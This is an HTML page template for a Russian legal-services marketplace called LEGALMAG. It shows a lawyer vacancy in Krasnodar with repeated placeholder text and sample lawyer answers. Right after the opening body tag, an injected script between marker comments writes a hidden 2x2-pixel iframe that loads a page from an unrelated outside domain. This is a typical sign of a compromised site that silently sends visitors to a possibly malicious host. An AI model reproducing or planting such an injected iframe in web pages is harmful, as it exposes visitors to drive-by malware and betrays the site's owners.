<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="logged">
					Привет,&nbsp;<a class="enter" href="">Валентин!</a>
					<a class="register" href="">Выйти</a>
					<div class="sep"></div>
				</div>
				<nav class="auth"><!--top-navigation-->
					<ul>
						<li class="active"><a href="">Лента вопросов</a></li>
						<li><a href="">Каталог</a></li>
						<li><a href="">Личный кабинет</a></li>
						<li ><a href="">Вопросы и ответы</a></li>
						<li><a href="">Как это работает?</a></li>
					</ul>
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<aside id="left-col">
					<div id="user">
						<img src="design/img/noAvatar.png" alt="">
						<p class="name">Валентин Кислый</p>
						<a class="editProfile" href="">редактировать профиль</a>
						<p class="myMessages"><a href="">Мои сообщения</a> (<span>3</span>)</p>
					</div>
					<div id="post">
						<div>
							<img src="design/img/leftOne.png" alt="">
							<a class="head" href="">Задать вопрос</a>
							<p>Ваш вопрос будет доступен всем юристам</p>
						</div>
						<div>
							<img src="design/img/leftTwo.png" alt="">
							<a class="head" href="">Персональный вопрос</a>
							<p>Вы сожете выбрать кто будет отвечать на Ваш вопрос</p>
						</div>
						<div>
							<img src="design/img/leftThree.png" alt="">
							<a class="head" href="">Предложить работу</a>
							<p>Вы можете опубликовать вакансию, или разовую работу для юристов</p>
						</div>
						<div id="leftSay"></div>
					</div>
					<div id="offers">
						<h2>Предлагаю услуги:</h2>
						<dl>
							<dt><img src="design/images/offers.jpg" alt=""></dt>
							<dd class="name">Иванов Иван Сергеевич</dd>
							<dd class="spec">Специалист по гражданскому и семейному праву</dd>
							<dd><input type="submit" class="button-fox" value="Написать"></dd>
							<dd class="clear none">&nbsp;</dd>
						</dl>
						<dl>
							<dt><img src="design/images/offers.jpg" alt=""></dt>
							<dd class="name">Иванов Иван Сергеевич</dd>
							<dd class="spec">Специалист по гражданскому и семейному праву</dd>
							<dd><input type="submit" class="button-fox" value="Написать"></dd>
							<dd class="clear none">&nbsp;</dd>
						</dl>
						<dl>
							<dt><img src="design/images/offers.jpg" alt=""></dt>
							<dd class="name">Иванов Иван Сергеевич</dd>
							<dd class="spec">Специалист по гражданскому и семейному праву</dd>
							<dd><input type="submit" class="button-fox" value="Написать"></dd>
							<dd class="clear none">&nbsp;</dd>
						</dl>
					</div>
				</aside>
				<section id="right-col">
					<div class="wrapper">
						<div class="head">
							<span>Вакансия</span>
						</div>
						<section class="body visible">
							<div class="question">
								<table>
									<tr>
										<td rowspan="10" class="first">
											<p  class="qSubscribe"></p>
											<span>3</span>
											<a href="">Подписаться</a>
										</td>
										<td class="title"><a href="">Требуется юрист в районный суд города Краснодара</a></td>
									</tr>
									<tr>
										<td class="details">Оплата: <strong>10 000 руб.</strong></td>
									<tr>
										<td class="details">Срок выполнения: <strong>10 дней</strong></td>
									</tr>
									<tr>
										<td class="details">Регион: <strong>Краснодар</strong></td>
									</tr>
									<tr>
										<td><strong>Описание проекта</strong></td>
									</tr>
									<tr>
										<td>Предположим, что решение вынесено и получено на руки 30/12</td>
									</tr>
									<tr>
										<td><strong>Требования к исполнителю проекта</strong></td>
									</tr>
									<tr>
										<td>Предположим, что решение вынесено и получено на руки 30/12</td>
									</tr>
									<tr>
										<td><strong>Условия оплаты</strong></td>
									</tr>
									<tr>
										<td>Предположим, что решение вынесено и получено на руки 30/12</td>
									</tr>
								</table>
								<div class="summary">
									<p class="time">15 часов 19 минут назад</p>
									<p class="views">5 просмотров</p>
									<p class="answers"> 0 ответов</p>
									<p class="author">Автор: <a href="">Александра</a></p>
									<p class="privatMessage"><a href="">личное сообщение</a></p>
								</div>
								<div class="clear ">&nbsp;</div>
							</div>
						</section>
					</div>
					<div class="answerQuestion">
						<form>
							<h3><label for="answerQuestion-field">Комментарии к публикации:</label></h3>
							<textarea name="answerQuestion-field" id="answerQuestion-field" autofocus></textarea>
							<div class="buttonHolder6">
								<input type="submit" class="buttonPublish" value="Опубликовать">
								<div class="recommend">
									<span>Рекомендовать страницу:</span>
									<img src="design/images/recommend.jpg" alt="">
								</div>
							</div>
						</form>
					</div>
					<section id="questionAnswers">
						<h3>Ответы: <span>(12)</span></h3>
						<div class="levelOne">
							<div class="up">
								<div class="left">
									<div class="img"><img src="design/images/face.jpg" alt=""></div>
									<a href="">Иванова Снежанна Нургалиевна</a><span>, адвокат</span>
									<p>Практика: Краснодар, Ростов, Тлюстенхабль</p>
								</div>
								<div class="right">
									<p>3 дня назад</p>
									<img src="design/images/5stars.png" alt="">
								</div>
								<div class="clear">&nbsp;</div>
							</div>
							<div class="down">
								<p>Действительно это ошибка, которую следует исправить. Напишите заявление в риелторскую фирму с требование внести такие изменения и отошлите заказным письмом с уведомлением. Они должны в течении месяца принять меры по исправлению такой ошибки.</p>
								<div class="buttonHolder7">
									<input type="submit" class="buttonReplay" value="Ответить">
									<div class="right">
										<input type="submit" class="buttonThankYou" value="Спасибо!">
										<input type="submit" class="buttonNoThanks" value="Ответ не помог">
									</div>
									<div class="clear">&nbsp;</div>
								</div>
							</div>
						</div>
										<div class="levelTwo">
											<div class="up">
												<div class="left">
													<div class="img"><img src="design/img/noImage.png" alt=""></div>
													<a href="">Иванова Снежанна Нургалиевна</a>
												</div>
												<div class="right">
													<p>3 дня назад</p>
												</div>
												<div class="clear">&nbsp;</div>
											</div>
											<div class="down">
												<p>Действительно это ошибка, которую следует исправить. Напишите заявление в риелторскую фирму с требование внести такие изменения и отошлите заказным письмом с уведомлением. Они должны в течении месяца принять меры по исправлению такой ошибки.</p>
												<div class="buttonHolder7">
													<input type="submit" class="buttonReplay" value="Ответить">
												</div>
											</div>
										</div>
						<div class="levelOne">
							<div class="up">
								<div class="left">
									<div class="img"><img src="design/images/face.jpg" alt=""></div>
									<a href="">Иванова Снежанна Нургалиевна</a><span>, адвокат</span>
									<p>Практика: Краснодар, Ростов, Тлюстенхабль</p>
								</div>
								<div class="right">
									<p>3 дня назад</p>
									<img src="design/images/5stars.png" alt="">
								</div>
								<div class="clear">&nbsp;</div>
							</div>
							<div class="down">
								<p>Действительно это ошибка, которую следует исправить. Напишите заявление в риелторскую фирму с требование внести такие изменения и отошлите заказным письмом с уведомлением. Они должны в течении месяца принять меры по исправлению такой ошибки. Действительно это ошибка, которую следует исправить. Напишите заявление в риелторскую фирму с требование внести такие изменения и отошлите заказным письмом с уведомлением. Они должны в течении месяца принять меры по исправлению такой ошибки.Действительно это ошибка, которую следует исправить. Напишите заявление в риелторскую фирму с требование внести такие изменения и отошлите заказным письмом с уведомлением. Они должны в течении месяца принять меры по исправлению такой ошибки.Действительно это ошибка, которую следует исправить. Напишите заявление в риелторскую фирму с требование внести такие изменения и отошлите заказным письмом с уведомлением. Они должны в течении </p>
								<div class="buttonHolder7">
									<input type="submit" class="buttonReplay" value="Ответить">
									<div class="right">
										<input type="submit" class="buttonThankYou" value="Спасибо!">
										<input type="submit" class="buttonNoThanks" value="Ответ не помог">
									</div>
									<div class="clear">&nbsp;</div>
								</div>
								<div class="respond">
									<form>
										<textarea></textarea>
										<input type="submit" class="buttonReplay" value="Опубликовать">
									</form>
								</div>
							</div>
						</div>
					</section>
				</section>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>